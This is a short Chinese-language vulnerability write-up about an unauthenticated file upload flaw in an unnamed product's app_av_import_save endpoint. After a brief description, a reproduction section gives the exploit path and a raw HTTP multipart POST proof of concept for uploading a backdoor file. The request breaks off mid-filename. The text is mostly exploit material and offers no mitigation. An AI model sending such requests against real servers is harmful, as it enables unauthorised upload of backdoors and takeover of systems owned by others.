0x01漏洞描述
其软件中的app_av_import_save接口存在严重的文件上传漏洞。这一漏洞可能被未经授权的攻击者利用,通过上传恶意后门文件的方式获取服务器权限,从而对系统进行潜在的危险操作
0x02漏洞复现
(1)payload利用地址:/?g=app_av_import_save
(2)上传文件POC:
POST /?g=app_av_import_save HTTP/1.1
Host: 127.0.0.1:4433
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Content-Length: 514
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"
10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="st